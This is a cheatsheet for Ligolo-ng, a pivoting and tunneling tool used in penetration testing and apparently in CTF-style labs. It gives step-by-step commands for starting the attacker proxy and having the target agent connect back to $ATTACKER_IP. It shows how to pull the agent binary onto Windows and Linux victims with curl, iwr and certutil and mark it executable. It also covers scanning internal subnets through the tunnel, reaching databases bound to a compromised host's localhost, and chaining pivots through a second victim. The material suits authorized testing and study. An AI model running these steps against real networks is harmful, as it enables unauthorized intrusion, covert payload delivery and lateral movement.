Ligolo-ng cheatsheet¶

Basic setup¶

Attacker - start Ligolo proxy

sudo ./lig-proxy -selfcert -laddr 0.0.0.0:443

Target - run agent

# Linux
./lig-agent -connect $ATTACKER_IP:443 -ignore-cert

# Windows
.\lig-agent.exe -connect $ATTACKER_IP:443 -ignore-cert

WindowsLinux

Transfer agent quickly

# From attacker
python3 -m http.server 8000

# From target
mkdir C:\temp

curl -o C:\temp\lig-agent.exe http://$ATTACKER_IP:8000/lig-agent.exe

iwr -uri http://$ATTACKER_IP:8000/lig-agent.exe -Outfile C:\temp\lig-agent.exe

certutil -urlcache -f http://$ATTACKER:8000/lig-agent.exe C:\temp\lig-agent.exe

Transfer agent quickly

# From attacker
python3 -m http.server 8000

# From target
curl -s -o /tmp/lig-agent http://$ATTACKER_IP:8000/lig-agent
chmod +x /tmp/lig-agent

Tunneling¶

Ligolo proxy console

# manually create & start tunnel
session
ifcreate --name pivot1
interface_add_route --name pivot1 --route 10.10.10.0/24
tunnel_start --tun pivot1

# or use the autoroute feature on the selected session
session
autoroute

Scan through tunnel

nmap -sT -Pn 10.10.10.0/24

Access target localhost services (route 240)¶

Use this when services are only bound to 127.0.0.1 on the compromised host.

Ligolo proxy console - add localhost route

session
ifcreate --name loop
interface_add_route --name loop --route 240.0.0.1/32
tunnel_start --tun loop

Now, from attacker machine, connect to remote localhost services via 240.0.0.1:

Examples via 240.0.0.1/32

# Web app on victim localhost:3000
curl http://240.0.0.1:3000

# MongoDB on victim localhost:27017
mongosh 240.0.0.1:27017

# MySQL/MariaDB on victim localhost:3306
mysql -h 240.0.0.1 -u root -p

Multi pivot¶

In a scenario where you need to access more than 1 network, you can use listeners to bind a port of an already compromised host to your attacker's ligolo proxy port; and so be able to join attacker's ligolo proxy from the second victim host.

Scenario example

X - attacker - Ligolo proxy runnning on 192.168.10.5:443
A - victim_A - First host compromised - Can access DMZ & routeA
B - victim_B - Second host compromised - Can access routeA & routeB

Ligolo proxy console - listener

# Bind victim_A:443 to our attacker's ligolo proxy
listener_add --addr $victim_A:443 --to 192.168.10.5:443 --tcp

Join attacker ligolo proxy from victim_B

# Now that our listener is up, we can launch the ligolo agent on the victim_B compromised host.
lig-agent -connect $victim_A:443 -ignore-cert &

Tips¶

Some proxy commands have alias that are simpler:

ifcreate <-> interface_create
interface_add_route --name X --route Y <-> route_add --name X --route Y